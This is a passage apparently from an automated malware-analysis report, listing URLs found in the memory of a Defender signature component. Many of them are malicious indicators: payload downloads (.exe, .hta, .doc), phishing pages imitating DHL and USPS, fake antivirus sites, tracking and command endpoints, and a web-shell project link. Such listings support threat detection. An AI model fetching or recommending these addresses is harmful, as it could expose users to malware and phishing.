Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://chilai.com/system/libraries/tep.txt
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://chiuwes.com//kemu.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://chu.pe/6xo
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://cjrajan.pw/2/3/4/invoice.docx
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://ckpetchem.com
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://claus-wieben.de/sdor1om4hl5naz
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://clean-pelican.cloudvent.net/dxdae.html)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://clients.lb1networks.com/upd.php?
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://cn%d.evasi0n.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://comfirm001.site.bz/hl/dhl%20zip/dhl/dhl%20_%20tracking.htm
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://coppolarestaurant.com/cgi/resume2.php?id=
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: WerFault.exe, 00000009.00000002.3011223832.000000000635B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: WerFault.exe, 00000009.00000002.3011223832.000000000635B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://crocus93.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://cscentralcard.com.br/colors/coffee/report-sfexpress.php
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://csjksco.com/initial/)
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://d4uk.7h4uk.com/w_case/login.php
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp	String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://dl.river-store.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://down.admin7a57a5a743894a0e.club/4.exe
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp	String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
